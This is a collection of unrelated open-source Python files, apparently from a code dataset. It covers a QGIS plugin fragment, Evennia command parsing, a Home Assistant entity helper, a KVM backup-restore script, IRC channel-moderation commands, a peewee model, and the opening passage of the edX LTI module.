self.iface.mapCanvas().setRenderFlag(True)
from dockableMirrorMap import DockableMirrorMap
dockwidget = DockableMirrorMap(self.iface.mainWindow(), self.iface)
minsize = dockwidget.minimumSize()
maxsize = dockwidget.maximumSize()
# restore position
floating, ok = QgsProject.instance().readBoolEntry("DockableMirrorMap", "/mirror%s/floating" % i)
if ok:
dockwidget.setFloating( floating )
position, ok = QgsProject.instance().readEntry("DockableMirrorMap", "/mirror%s/position" % i)
if ok:
try:
if floating:
parts = position.split(" ")
if len(parts) >= 2:
dockwidget.move( int(parts[0]), int(parts[1]) )
else:
dockwidget.setLocation( int(position) )
except ValueError:
pass
# restore geometry
dockwidget.setFixedSize( dockwidget.geometry().width(), dockwidget.geometry().height() )
size, ok = QgsProject.instance().readEntry("DockableMirrorMap", "/mirror%s/size" % i)
if ok:
try:
parts = size.split(" ")
dockwidget.setFixedSize( int(parts[0]), int(parts[1]) )
except ValueError:
pass
scaleFactor, ok = QgsProject.instance().readDoubleEntry("DockableMirrorMap", "/mirror%s/scaleFactor" % i, 1.0)
if ok: dockwidget.getMirror().scaleFactor.setValue( scaleFactor )
# get layer list
layerIds, ok = QgsProject.instance().readListEntry("DockableMirrorMap", "/mirror%s/layers" % i)
if ok: dockwidget.getMirror().setLayerSet( layerIds )
self.addDockWidget( dockwidget )
dockwidget.setMinimumSize(minsize)
dockwidget.setMaximumSize(maxsize)
|
alfanugraha/LUMENS-repo
|
processing/DockableMirrorMap/dockableMirrorMapPlugin.py
|
Python
|
gpl-2.0
| 8,306 | 0.032145 |
"""
The command template for the default MUX-style command set. There
is also an Player/OOC version that makes sure caller is a Player object.
"""
from evennia.utils import utils
from evennia.commands.command import Command
# limit symbol import for API
__all__ = ("MuxCommand", "MuxPlayerCommand")
class MuxCommand(Command):
"""
This sets up the basis for a MUX command. The idea
is that most other Mux-related commands should just
inherit from this and don't have to implement much
parsing of their own unless they do something particularly
advanced.
Note that the class's __doc__ string (this text) is
used by Evennia to create the automatic help entry for
the command, so make sure to document consistently here.
"""
def has_perm(self, srcobj):
"""
This is called by the cmdhandler to determine
if srcobj is allowed to execute this command.
We just show it here for completeness - we
are satisfied using the default check in Command.
"""
return super(MuxCommand, self).has_perm(srcobj)
def at_pre_cmd(self):
"""
This hook is called before self.parse() on all commands
"""
pass
def at_post_cmd(self):
"""
This hook is called after the command has finished executing
(after self.func()).
"""
pass
def parse(self):
"""
This method is called by the cmdhandler once the command name
has been identified. It creates a new set of member variables
that can be later accessed from self.func() (see below)
The following variables are available for our use when entering this
method (from the command definition, and assigned on the fly by the
cmdhandler):
self.key - the name of this command ('look')
self.aliases - the aliases of this cmd ('l')
self.permissions - permission string for this command
self.help_category - overall category of command
self.caller - the object calling this command
self.cmdstring - the actual command name used to call this
(this allows you to know which alias was used,
for example)
self.args - the raw input; everything following self.cmdstring.
self.cmdset - the cmdset from which this command was picked. Not
often used (useful for commands like 'help' or to
list all available commands etc)
self.obj - the object on which this command was defined. It is often
the same as self.caller.
A MUX command has the following possible syntax:
name[ with several words][/switch[/switch..]] arg1[,arg2,...] [[=|,] arg[,..]]
The 'name[ with several words]' part is already dealt with by the
cmdhandler at this point, and stored in self.cmdname (we don't use
it here). The rest of the command is stored in self.args, which can
start with the switch indicator /.
This parser breaks self.args into its constituents and stores them in the
following variables:
self.switches = [list of /switches (without the /)]
self.raw = This is the raw argument input, including switches
self.args = This is re-defined to be everything *except* the switches
self.lhs = Everything to the left of = (lhs:'left-hand side'). If
no = is found, this is identical to self.args.
self.rhs: Everything to the right of = (rhs:'right-hand side').
If no '=' is found, this is None.
self.lhslist - [self.lhs split into a list by comma]
self.rhslist - [list of self.rhs split into a list by comma]
self.arglist = [list of space-separated args (stripped, including '=' if it exists)]
All args and list members are stripped of excess whitespace around the
strings, but case is preserved.
"""
raw = self.args
args = raw.strip()
# split out switches
switches = []
if args and len(args) > 1 and args[0] == "/":
# we have a switch, or a set of switches. These end with a space.
#print "'%s'" % args
switches = args[1:].split(None, 1)
if len(switches) > 1:
switches, args = switches
switches = switches.split('/')
else:
args = ""
switches = switches[0].split('/')
arglist = [arg.strip() for arg in args.split()]
# check for arg1, arg2, ... = argA, argB, ... constructs
lhs, rhs = args, None
lhslist, rhslist = [arg.strip() for arg in args.split(',')], []
if args and '=' in args:
lhs, rhs = [arg.strip() for arg in args.split('=', 1)]
lhslist = [arg.strip() for arg in lhs.split(',')]
rhslist = [arg.strip() for arg in rhs.split(',')]
# save to object properties:
self.raw = raw
self.switches = switches
self.args = args.strip()
self.arglist = arglist
self.lhs = lhs
self.lhslist = lhslist
self.rhs = rhs
self.rhslist = rhslist
def func(self):
"""
This is the hook function that actually does all the work. It is called
by the cmdhandler right after self.parser() finishes, and so has access
to all the variables defined therein.
"""
# a simple test command to show the available properties
string = "-" * 50
string += "\n{w%s{n - Command variables from evennia:\n" % self.key
string += "-" * 50
string += "\nname of cmd (self.key): {w%s{n\n" % self.key
string += "cmd aliases (self.aliases): {w%s{n\n" % self.aliases
string += "cmd locks (self.locks): {w%s{n\n" % self.locks
string += "help category (self.help_category): {w%s{n\n" % self.help_category
string += "object calling (self.caller): {w%s{n\n" % self.caller
string += "object storing cmdset (self.obj): {w%s{n\n" % self.obj
string += "command string given (self.cmdstring): {w%s{n\n" % self.cmdstring
# show cmdset.key instead of cmdset to shorten output
string += utils.fill("current cmdset (self.cmdset): {w%s{n\n" % self.cmdset)
string += "\n" + "-" * 50
string += "\nVariables from MuxCommand baseclass\n"
string += "-" * 50
string += "\nraw argument (self.raw): {w%s{n \n" % self.raw
string += "cmd args (self.args): {w%s{n\n" % self.args
string += "cmd switches (self.switches): {w%s{n\n" % self.switches
string += "space-separated arg list (self.arglist): {w%s{n\n" % self.arglist
string += "lhs, left-hand side of '=' (self.lhs): {w%s{n\n" % self.lhs
string += "lhs, comma separated (self.lhslist): {w%s{n\n" % self.lhslist
string += "rhs, right-hand side of '=' (self.rhs): {w%s{n\n" % self.rhs
string += "rhs, comma separated (self.rhslist): {w%s{n\n" % self.rhslist
string += "-" * 50
self.caller.msg(string)
class MuxPlayerCommand(MuxCommand):
"""
This is an on-Player version of the MuxCommand. Since these commands sit
on Players rather than on Characters/Objects, we need to check
this in the parser.
Player commands are available also when puppeting a Character, it's
just that they are applied with a lower priority and are always
available, also when disconnected from a character (i.e. "ooc").
This class makes sure that caller is always a Player object, while
creating a new property "character" that is set only if a
character is actually attached to this Player and Session.
"""
def parse(self):
"""
We run the parent parser as usual, then fix the result
"""
super(MuxPlayerCommand, self).parse()
if utils.inherits_from(self.caller, "evennia.objects.objects.DefaultObject"):
# caller is an Object/Character
self.character = self.caller
self.caller = self.caller.player
elif utils.inherits_from(self.caller, "evennia.players.players.DefaultPlayer"):
# caller was already a Player
self.character = self.caller.get_puppet(self.sessid)
else:
self.character = None
|
emergebtc/muddery
|
evennia/evennia/commands/default/muxcommand.py
|
Python
|
bsd-3-clause
| 8,473 | 0.002124 |
"""Helpers for components that manage entities."""
import asyncio
from datetime import timedelta
from itertools import chain
import logging
from homeassistant import config as conf_util
from homeassistant.setup import async_prepare_setup_platform
from homeassistant.const import (
ATTR_ENTITY_ID, CONF_SCAN_INTERVAL, CONF_ENTITY_NAMESPACE, MATCH_ALL)
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform, discovery
from homeassistant.helpers.service import extract_entity_ids
from homeassistant.loader import bind_hass
from homeassistant.util import slugify
from .entity_platform import EntityPlatform
DEFAULT_SCAN_INTERVAL = timedelta(seconds=15)
DATA_INSTANCES = 'entity_components'
@bind_hass
async def async_update_entity(hass, entity_id):
"""Trigger an update for an entity."""
domain = entity_id.split('.', 1)[0]
entity_comp = hass.data.get(DATA_INSTANCES, {}).get(domain)
if entity_comp is None:
logging.getLogger(__name__).warning(
'Forced update failed. Component for %s not loaded.', entity_id)
return
entity = entity_comp.get_entity(entity_id)
if entity is None:
logging.getLogger(__name__).warning(
'Forced update failed. Entity %s not found.', entity_id)
return
await entity.async_update_ha_state(True)
class EntityComponent:
"""The EntityComponent manages platforms that manages entities.
This class has the following responsibilities:
- Process the configuration and set up a platform based component.
- Manage the platforms and their entities.
- Help extract the entities from a service call.
- Maintain a group that tracks all platform entities.
- Listen for discovery events for platforms related to the domain.
"""
def __init__(self, logger, domain, hass,
scan_interval=DEFAULT_SCAN_INTERVAL, group_name=None):
"""Initialize an entity component."""
self.logger = logger
self.hass = hass
self.domain = domain
self.scan_interval = scan_interval
self.group_name = group_name
self.config = None
self._platforms = {
domain: self._async_init_entity_platform(domain, None)
}
self.async_add_entities = self._platforms[domain].async_add_entities
self.add_entities = self._platforms[domain].add_entities
hass.data.setdefault(DATA_INSTANCES, {})[domain] = self
@property
def entities(self):
"""Return an iterable that returns all entities."""
return chain.from_iterable(platform.entities.values() for platform
in self._platforms.values())
def get_entity(self, entity_id):
"""Get an entity."""
for platform in self._platforms.values():
entity = platform.entities.get(entity_id)
if entity is not None:
return entity
return None
def setup(self, config):
"""Set up a full entity component.
This doesn't block the executor to protect from deadlocks.
"""
self.hass.add_job(self.async_setup(config))
async def async_setup(self, config):
"""Set up a full entity component.
Loads the platforms from the config and will listen for supported
discovered platforms.
This method must be run in the event loop.
"""
self.config = config
# Look in config for Domain, Domain 2, Domain 3 etc and load them
tasks = []
for p_type, p_config in config_per_platform(config, self.domain):
tasks.append(self._async_setup_platform(p_type, p_config))
if tasks:
await asyncio.wait(tasks, loop=self.hass.loop)
# Generic discovery listener for loading platform dynamically
# Refer to: homeassistant.components.discovery.load_platform()
async def component_platform_discovered(platform, info):
"""Handle the loading of a platform."""
await self._async_setup_platform(platform, {}, info)
discovery.async_listen_platform(
self.hass, self.domain, component_platform_discovered)
async def async_setup_entry(self, config_entry):
"""Set up a config entry."""
platform_type = config_entry.domain
platform = await async_prepare_setup_platform(
self.hass, self.config, self.domain, platform_type)
if platform is None:
return False
key = config_entry.entry_id
if key in self._platforms:
raise ValueError('Config entry has already been setup!')
self._platforms[key] = self._async_init_entity_platform(
platform_type, platform,
scan_interval=getattr(platform, 'SCAN_INTERVAL', None),
)
return await self._platforms[key].async_setup_entry(config_entry)
async def async_unload_entry(self, config_entry):
"""Unload a config entry."""
key = config_entry.entry_id
platform = self._platforms.pop(key, None)
if platform is None:
raise ValueError('Config entry was never loaded!')
await platform.async_reset()
return True
@callback
def async_extract_from_service(self, service, expand_group=True):
"""Extract all known and available entities from a service call.
Will return all entities if no entities specified in call.
Will return an empty list if entities specified but unknown.
This method must be run in the event loop.
"""
data_ent_id = service.data.get(ATTR_ENTITY_ID)
if data_ent_id in (None, MATCH_ALL):
if data_ent_id is None:
self.logger.warning(
'Not passing an entity ID to a service to target all '
'entities is deprecated. Update your call to %s.%s to be '
'instead: entity_id: "*"', service.domain, service.service)
return [entity for entity in self.entities if entity.available]
entity_ids = set(extract_entity_ids(self.hass, service, expand_group))
return [entity for entity in self.entities
if entity.available and entity.entity_id in entity_ids]
@callback
def async_register_entity_service(self, name, schema, func):
"""Register an entity service."""
async def handle_service(call):
"""Handle the service."""
await self.hass.helpers.service.entity_service_call(
self._platforms.values(), func, call
)
self.hass.services.async_register(
self.domain, name, handle_service, schema)
async def _async_setup_platform(self, platform_type, platform_config,
discovery_info=None):
"""Set up a platform for this component."""
platform = await async_prepare_setup_platform(
self.hass, self.config, self.domain, platform_type)
if platform is None:
return
# Use config scan interval, fallback to platform if none set
scan_interval = platform_config.get(
CONF_SCAN_INTERVAL, getattr(platform, 'SCAN_INTERVAL', None))
entity_namespace = platform_config.get(CONF_ENTITY_NAMESPACE)
key = (platform_type, scan_interval, entity_namespace)
if key not in self._platforms:
self._platforms[key] = self._async_init_entity_platform(
platform_type, platform, scan_interval, entity_namespace
)
await self._platforms[key].async_setup(platform_config, discovery_info)
@callback
def _async_update_group(self):
"""Set up and/or update component group.
This method must be run in the event loop.
"""
if self.group_name is None:
return
ids = [entity.entity_id for entity in
sorted(self.entities,
key=lambda entity: entity.name or entity.entity_id)]
self.hass.async_create_task(
self.hass.services.async_call(
'group', 'set', dict(
object_id=slugify(self.group_name),
name=self.group_name,
visible=False,
entities=ids)))
async def _async_reset(self):
"""Remove entities and reset the entity component to initial values.
This method must be run in the event loop.
"""
tasks = [platform.async_reset() for platform
in self._platforms.values()]
if tasks:
await asyncio.wait(tasks, loop=self.hass.loop)
self._platforms = {
self.domain: self._platforms[self.domain]
}
self.config = None
if self.group_name is not None:
await self.hass.services.async_call(
'group', 'remove', dict(
object_id=slugify(self.group_name)))
async def async_remove_entity(self, entity_id):
"""Remove an entity managed by one of the platforms."""
for platform in self._platforms.values():
if entity_id in platform.entities:
await platform.async_remove_entity(entity_id)
async def async_prepare_reload(self):
"""Prepare reloading this entity component.
This method must be run in the event loop.
"""
try:
conf = await \
conf_util.async_hass_config_yaml(self.hass)
except HomeAssistantError as err:
self.logger.error(err)
return None
conf = conf_util.async_process_component_config(
self.hass, conf, self.domain)
if conf is None:
return None
await self._async_reset()
return conf
def _async_init_entity_platform(self, platform_type, platform,
scan_interval=None, entity_namespace=None):
"""Initialize an entity platform."""
if scan_interval is None:
scan_interval = self.scan_interval
return EntityPlatform(
hass=self.hass,
logger=self.logger,
domain=self.domain,
platform_name=platform_type,
platform=platform,
scan_interval=scan_interval,
entity_namespace=entity_namespace,
async_entities_added_callback=self._async_update_group,
)
|
tinloaf/home-assistant
|
homeassistant/helpers/entity_component.py
|
Python
|
apache-2.0
| 10,538 | 0 |
"""
Given a KVM machine description file, parse its XML
and change the contents of the nodes "name" and "disk/source.file".
Usage:
python restore_kvm_backup.py \
-x '/kvm/backups/centos7-06/kvm/backups/centos7-06/20180924.0850.23/config.xml' \
-b '/kvm/backups/centos7-06/kvm/backups/centos7-06/20180924.0850.23/centos7-06.qcow2' \
-n 'centos7-06' \
-i '/kvm/images/centos7-06.qcow2';
"""
import argparse
import os
import subprocess
import sys
import xml.etree.ElementTree as et
from time import sleep
cli_parser = argparse.ArgumentParser()
cli_parser.add_argument("-x", "--xml-file", required=True,
help="the backup kvm xml configuration file "
"containing the machine description.")
cli_parser.add_argument("-b", "--backup-image-file", required=True,
help="the full path to the qcow2 image file to be restored")
cli_parser.add_argument("-n", "--vm-name", required=True,
help="image name of the vm to show on make status")
cli_parser.add_argument("-i", "--destination-image-file", required=True,
help="the full path to where the qcow2 image must be restored")
args = vars(cli_parser.parse_args())
XML_FILE = args['xml_file']
VM_NAME = args['vm_name']
BACKUP_IMAGE_FILE = args['backup_image_file']
IMAGE_FILE = args['destination_image_file']
XML_RESTORATION_FILE = '/tmp/restoration.xml'
if not os.path.exists(XML_FILE):
print('The backup vm XML config file was not found, impossible to move on.')
sys.exit(1)
if not os.path.exists(BACKUP_IMAGE_FILE):
print('The backup image file was not found, impossible to move on.')
sys.exit(1)
def change_backup_xml_configuration_to_restore_vm():
tree = et.parse(XML_FILE)
root = tree.getroot()
for name in root.iter('name'):
name.text = VM_NAME
for disk in root.iter('disk'):
for child in disk:
if child.tag == 'source' and child.attrib['file'].endswith('qcow2'):
child.attrib['file'] = IMAGE_FILE
break
tree.write(XML_RESTORATION_FILE)
print('DONE. The new XML file you must use to restore your VM '
'is at {}.'.format(XML_RESTORATION_FILE))
if __name__ == "__main__":
print('Shutting down vm if it is active...')
subprocess.run(['sudo', 'virsh', 'shutdown', VM_NAME])
print('Removing existing vm...')
subprocess.run(['sudo', 'virsh', 'undefine', VM_NAME])
print('Removing disk for the existing vm...')
if os.path.exists(IMAGE_FILE):
os.unlink(IMAGE_FILE)
print('Changing backup kvm config to restoration...')
change_backup_xml_configuration_to_restore_vm()
print('Copying the backup disk as the vm disk...')
subprocess.run(['sudo', 'cp', '-farv', BACKUP_IMAGE_FILE, IMAGE_FILE])
print('Restoring vm to the backup image...')
subprocess.run(['sudo', 'virsh', '-c', 'qemu:///system', 'define', XML_RESTORATION_FILE])
print('Giving some time before starting the vm...')
sleep(5)
print('Starting the restored vm now...')
subprocess.run(['sudo', 'virsh', '-c', 'qemu:///system', 'start', VM_NAME])
print('DONE.')
|
tiagoprn/devops
|
shellscripts/kvm/restore_kvm_backup.py
|
Python
|
mit
| 3,178 | 0.002203 |
from ralybot import hook
def mode_cmd(mode, text, text_inp, chan, conn, notice):
""" generic mode setting function """
split = text_inp.split(" ")
if split[0].startswith("#"):
channel = split[0]
target = split[1]
notice("Attempting to {} {} in {}...".format(text, target, channel))
conn.send("MODE {} {} {}".format(channel, mode, target))
else:
channel = chan
target = split[0]
notice("Attempting to {} {} in {}...".format(text, target, channel))
conn.send("MODE {} {} {}".format(channel, mode, target))
def mode_cmd_no_target(mode, text, text_inp, chan, conn, notice):
""" generic mode setting function without a target"""
split = text_inp.split(" ")
if split[0].startswith("#"):
channel = split[0]
notice("Attempting to {} {}...".format(text, channel))
conn.send("MODE {} {}".format(channel, mode))
else:
channel = chan
notice("Attempting to {} {}...".format(text, channel))
conn.send("MODE {} {}".format(channel, mode))
@hook.command(permissions=["op_ban", "op"])
def ban(text, conn, chan, notice):
"""[channel] <user> - bans <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+b", "ban", text, chan, conn, notice)
@hook.command(permissions=["op_ban", "op"])
def unban(text, conn, chan, notice):
"""[channel] <user> - unbans <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-b", "unban", text, chan, conn, notice)
@hook.command(permissions=["op_quiet", "op"])
def quiet(text, conn, chan, notice):
"""[channel] <user> - quiets <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+q", "quiet", text, chan, conn, notice)
@hook.command(permissions=["op_quiet", "op"])
def unquiet(text, conn, chan, notice):
"""[channel] <user> - unquiets <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-q", "unquiet", text, chan, conn, notice)
@hook.command(permissions=["op_voice", "op"])
def voice(text, conn, chan, notice):
"""[channel] <user> - voices <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+v", "voice", text, chan, conn, notice)
@hook.command(permissions=["op_voice", "op"])
def devoice(text, conn, chan, notice):
"""[channel] <user> - devoices <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-v", "devoice", text, chan, conn, notice)
@hook.command(permissions=["op_op", "op"])
def op(text, conn, chan, notice):
"""[channel] <user> - ops <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("+o", "op", text, chan, conn, notice)
@hook.command(permissions=["op_op", "op"])
def deop(text, conn, chan, notice):
"""[channel] <user> - deops <user> in [channel], or in the caller's channel if no channel is specified"""
mode_cmd("-o", "deop", text, chan, conn, notice)
@hook.command(permissions=["op_topic", "op"])
def topic(text, conn, chan):
"""[channel] <topic> - changes the topic to <topic> in [channel], or in the caller's channel
if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
message = " ".join(split[1:])
chan = split[0]
else:
message = " ".join(split)
conn.send("TOPIC {} :{}".format(chan, message))
@hook.command(permissions=["op_kick", "op"])
def kick(text, chan, conn, notice):
"""[channel] <user> - kicks <user> from [channel], or from the caller's channel if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
channel = split[0]
target = split[1]
if len(split) > 2:
reason = " ".join(split[2:])
out = "KICK {} {}: {}".format(channel, target, reason)
else:
out = "KICK {} {}".format(channel, target)
else:
channel = chan
target = split[0]
if len(split) > 1:
reason = " ".join(split[1:])
out = "KICK {} {} :{}".format(channel, target, reason)
else:
out = "KICK {} {}".format(channel, target)
notice("Attempting to kick {} from {}...".format(target, channel))
conn.send(out)
@hook.command(permissions=["op_rem", "op"])
def remove(text, chan, conn):
"""[channel] <user> - force removes <user> from [channel], or in the caller's channel if no channel is specified"""
split = text.split(" ")
if split[0].startswith("#"):
message = " ".join(split[1:])
chan = split[0]
out = "REMOVE {} :{}".format(chan, message)
else:
message = " ".join(split)
out = "REMOVE {} :{}".format(chan, message)
conn.send(out)
@hook.command(permissions=["op_mute", "op"], autohelp=False)
def mute(text, conn, chan, notice):
"""[channel] - mutes [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("+m", "mute", text, chan, conn, notice)
@hook.command(permissions=["op_mute", "op"], autohelp=False)
def unmute(text, conn, chan, notice):
"""[channel] - unmutes [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("-m", "unmute", text, chan, conn, notice)
@hook.command(permissions=["op_lock", "op"], autohelp=False)
def lock(text, conn, chan, notice):
"""[channel] - locks [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("+i", "lock", text, chan, conn, notice)
@hook.command(permissions=["op_lock", "op"], autohelp=False)
def unlock(text, conn, chan, notice):
"""[channel] - unlocks [channel], or in the caller's channel if no channel is specified"""
mode_cmd_no_target("-i", "unlock", text, chan, conn, notice)
|
Jakeable/Ralybot
|
plugins/admin_channel.py
|
Python
|
gpl-3.0
| 5,871 | 0.002555 |
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
def main(request, response):
headers = []
if 'Content-Type' in request.GET:
headers += [('Content-Type', request.GET['Content-Type'])]
with open('./resources/ahem/AHEM____.TTF') as f:
return 200, headers, f.read()
|
benschulz/servo
|
tests/wpt/mozilla/tests/mozilla/resources/no_mime_type.py
|
Python
|
mpl-2.0
| 443 | 0 |
from persistence.models import Agent, BaseModel
from peewee import *
class Message(BaseModel):
"""description of class"""
correlationid = CharField()
category = IntegerField()
body = CharField(null=True)
sender = ForeignKeyField(Agent, related_name='send_messages')
receiver = ForeignKeyField(Agent, related_name='received_messages')
# flags
complete = BooleanField(default=False)
processed = BooleanField(default=False)
# computed
def get_body(self):
if self.body is not None:
return self.body
if not self.complete:
return None
messageparts = sorted(self.parts, key=lambda x: x.position)
body = ''.join([part.body for part in messageparts])
return body
def as_dict(self):
return {
'id': self.correlationid,
'sender': self.sender.name,
'reciever': self.receiver.name,
'category': self.category,
'body': self.get_body()
}
|
onnovalkering/sparql-over-sms
|
sos-service/src/persistence/models/message.py
|
Python
|
mit
| 1,021 | 0.000979 |
"""
THIS MODULE IS DEPRECATED IN FAVOR OF https://github.com/edx/xblock-lti-consumer
Learning Tools Interoperability (LTI) module.
Resources
---------
Theoretical background and detailed specifications of LTI can be found on:
http://www.imsglobal.org/LTI/v1p1p1/ltiIMGv1p1p1.html
This module is based on the version 1.1.1 of the LTI specifications by the
IMS Global authority. For authentication, it uses OAuth1.
When responding back to the LTI tool provider, we must issue a correct
response. Types of responses and their message payload is available at:
Table A1.2 Interpretation of the 'CodeMajor/severity' matrix.
http://www.imsglobal.org/gws/gwsv1p0/imsgws_wsdlBindv1p0.html
A resource to test the LTI protocol (PHP realization):
http://www.imsglobal.org/developers/LTI/test/v1p1/lms.php
We have also begun to add support for LTI 1.2/2.0. We will keep this
docstring in synch with what support is available. The first LTI 2.0
feature to be supported is the REST API results service, see specification
at
http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html
What is supported:
------------------
1.) Display of simple LTI in iframe or a new window.
2.) Multiple LTI components on a single page.
3.) The use of multiple LTI providers per course.
4.) Use of advanced LTI component that provides back a grade.
A) LTI 1.1.1 XML endpoint
a.) The LTI provider sends back a grade to a specified URL.
b.) Currently only action "update" is supported. "Read", and "delete"
actions initially weren't required.
B) LTI 2.0 Result Service JSON REST endpoint
(http://www.imsglobal.org/lti/ltiv2p0/uml/purl.imsglobal.org/vocab/lis/v2/outcomes/Result/service.html)
a.) Discovery of all such LTI http endpoints for a course. External tools GET from this discovery
endpoint and receive URLs for interacting with individual grading units.
(see lms/djangoapps/courseware/views/views.py:get_course_lti_endpoints)
b.) GET, PUT and DELETE in LTI Result JSON binding
(http://www.imsglobal.org/lti/ltiv2p0/mediatype/application/vnd/ims/lis/v2/result+json/index.html)
for a provider to synchronize grades into edx-platform. Reading, Setting, and Deleteing
Numeric grades between 0 and 1 and text + basic HTML feedback comments are supported, via
GET / PUT / DELETE HTTP methods respectively
"""
from __future__ import absolute_import
import base64
import datetime
import hashlib
import logging
import textwrap
from xml.sax.saxutils import escape
from pkg_resources import resource_string
import bleach
import mock
import oauthlib.oauth1
import six
import six.moves.urllib.parse
from lxml import etree
from oauthlib.oauth1.rfc5849 import signature
from pytz import UTC
from six import text_type
from webob import Response
from xblock.core import List, Scope, String, XBlock
from xblock.fields import Boolean, Float
from xmodule.editing_module import MetadataOnlyEditingDescriptor
from xmodule.lti_2_util import LTI20ModuleMixin, LTIError
from xmodule.raw_module import EmptyDataRawDescriptor
from xmodule.x_module import XModule, module_attr
log = logging.getLogger(__name__)
DOCS_ANCHOR_TAG_OPEN = (
"<a target='_blank' "
"href='https://edx.readthedocs.io/projects/edx-partner-course-staff/en/latest/exercises_tools/lti_component.html'>"
)
# Make '_' a no-op so we can scrape strings. Using lambda instead of
# `django.utils.translation.ugettext_noop` because Django cannot be imported in this file
_ = lambda text: text
class LTIFields(object):
"""
Fields to define and obtain LTI tool from provider are set here,
except credentials, which should be set in course settings::
`lti_id` is id to connect tool with credentials in course settings. It should not contain :: (double semicolon)
`launch_url` is launch URL of tool.
`custom_parameters` are additional parameters to navigate to proper book and book page.
For example, for Vitalsource provider, `launch_url` should be
*https://bc-staging.vitalsource.com/books/book*,
and to get to proper book and book page, you should set custom parameters as::
vbid=put_book_id_here
book_location=page/put_page_number_here
Default non-empty URL for `launch_url` is needed due to oauthlib demand (URL scheme should be presented)::
https://github.com/idan/oauthlib/blob/master/oauthlib/oauth1/rfc5849/signature.py#L136
"""
display_name = String(
display_name=_("Display Name"),
help=_(
"The display name for this component. "
"Analytics reports may also use the display name to identify this component."
),
scope=Scope.settings,
default="LTI",
)
lti_id = String(
display_name=_("LTI ID"),
help=_(
"Enter the LTI ID for the external LTI provider. "
"This value must be the same LTI ID that you entered in the "
"LTI Passports setting on the Advanced Settings page."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
default='',
scope=Scope.settings
)
launch_url = String(
display_name=_("LTI URL"),
help=_(
"Enter the URL of the external tool that this component launches. "
"This setting is only used when Hide External Tool is set to False."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
default='http://www.example.com',
scope=Scope.settings)
custom_parameters = List(
display_name=_("Custom Parameters"),
help=_(
"Add the key/value pair for any custom parameters, such as the page your e-book should open to or "
"the background color for this component."
"<br />See {docs_anchor_open}the edX LTI documentation{anchor_close} for more details on this setting."
).format(
docs_anchor_open=DOCS_ANCHOR_TAG_OPEN,
anchor_close="</a>"
),
scope=Scope.settings)
open_in_a_new_page = Boolean(
display_name=_("Open in New Page"),
help=_(
"Select True if you want students to click a link that opens the LTI tool in a new window. "
"Select False if you want the LTI content to open in an IFrame in the current page. "
"This setting is only used when Hide External Tool is set to False. "
),
default=True,
scope=Scope.settings
)
has_score = Boolean(
display_name=_("Scored"),
help=_(
"Select True if this component will receive a numerical score from the external LTI system."
),
default=False,
scope=Scope.settings
)
weight = Float(
display_name=_("Weight"),
help=_(
"Enter the number of points possible for this component. "
"The default value is 1.0. "
"This setting is only used when Scored is set to True."
),
default=1.0,
scope=Scope.settings,
values={"min": 0},
)
module_score = Float(
help=_("The score kept in the xblock KVS -- duplicate of the published score in django DB"),
default=None,
scope=Scope.user_state
)
score_comment = String(
help=_("Comment as returned from grader, LTI2.0 spec"),
default="",
scope=Scope.user_state
)
hide_launch = Boolean(
display_name=_("Hide External Tool"),
help=_(
"Select True if you want to use this component as a placeholder for syncing with an external grading "
"system rather than launch an external tool. "
"This setting hides the Launch button and any IFrames for this component."
),
default=False,
scope=Scope.settings
)
# Users will be presented with a message indicating that their e-mail/username would be sent to a third
# party application. When "Open in New Page" is not selected, the tool automatically appears without any user action.
ask_to_send_username = Boolean(
display_name=_("Request user's username"),
# Translators: This is used to request the user's username for a third party service.
help=_("Select True to request the user's username."),
default=False,
scope=Scope.settings
)
ask_to_send_email = Boolean(
display_name=_("Request user's email"),
# Translators: This is used to request the user's email for a third party service.
help=_("Select True to request the user's email address."),
default=False,
scope=Scope.settings
)
description = String(
display_name=_("LTI Application Information"),
help=_(
"Enter a description of the third party application. If requesting username and/or email, use this text box to inform users "
"why their username and/or email will be forwarded to a third party application."
),
default="",
scope=Scope.settings
)
button_text = String(
display_name=_("Button Text"),
help=_(
"Enter the text on the button used to launch the third party application."
),
default="",
scope=Scope.settings
)
accept_grades_past_due = Boolean(
display_name=_("Accept grades past deadline"),
help=_("Select True to allow third party systems to post grades past the deadline."),
default=True,
scope=Scope.settings
)
class LTIModule(LTIFields, LTI20ModuleMixin, XModule):
"""
THIS MODULE IS DEPRECATED IN FAVOR OF https://github.com/edx/xblock-lti-consumer
Module provides LTI integration to course.
Except usual Xmodule structure it proceeds with OAuth signing.
How it works::
1. Get credentials from course settings.
2. There is minimal set of parameters need to be signed (presented for Vitalsource)::
user_id
oauth_callback
lis_outcome_service_url
lis_result_sourcedid
launch_presentation_return_url
lti_message_type
lti_version
roles
*+ all custom parameters*
These parameters should be encoded and signed by *OAuth1* together with
`launch_url` and *POST* request type.
3. Signing proceeds with client key/secret pair obtained from course settings.
That pair should be obtained from LTI provider and set into course settings by course author.
After that signature and other OAuth data are generated.
OAuth data which is generated after signing is usual::
oauth_callback
oauth_nonce
oauth_consumer_key
oauth_signature_method
oauth_timestamp
oauth_version
4. All that data is passed to form and sent to LTI provider server by browser via
autosubmit via JavaScript.
Form example::
<form
action="${launch_url}"
name="ltiLaunchForm-${element_id}"
class="ltiLaunchForm"
method="post"
